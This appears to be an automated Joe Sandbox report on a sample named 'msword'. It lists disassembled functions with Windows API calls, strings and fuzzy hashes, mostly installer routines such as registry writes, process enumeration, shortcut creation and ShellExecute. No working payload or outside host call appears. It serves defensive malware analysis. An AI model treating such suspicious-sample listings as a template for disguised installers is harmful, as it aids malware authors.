Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

PSAPI.DLL, xrefs: 00406464
Unknown, xrefs: 004064FC
Process32NextW, xrefs: 004065C8
Process32FirstW, xrefs: 004065BD
Module32NextW, xrefs: 004065DE
EnumProcesses, xrefs: 00406482
GetModuleBaseNameW, xrefs: 00406494
CreateToolhelp32Snapshot, xrefs: 004065B5
Kernel32.DLL, xrefs: 0040659B
EnumProcessModules, xrefs: 0040648A
Module32FirstW, xrefs: 004065D3

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
@%F, xrefs: 004042A7
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

NUL, xrefs: 00406A9E
%s=%s, xrefs: 00406B43
[Rename], xrefs: 00406BC8, 00406BD7
F, xrefs: 00406AE8

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
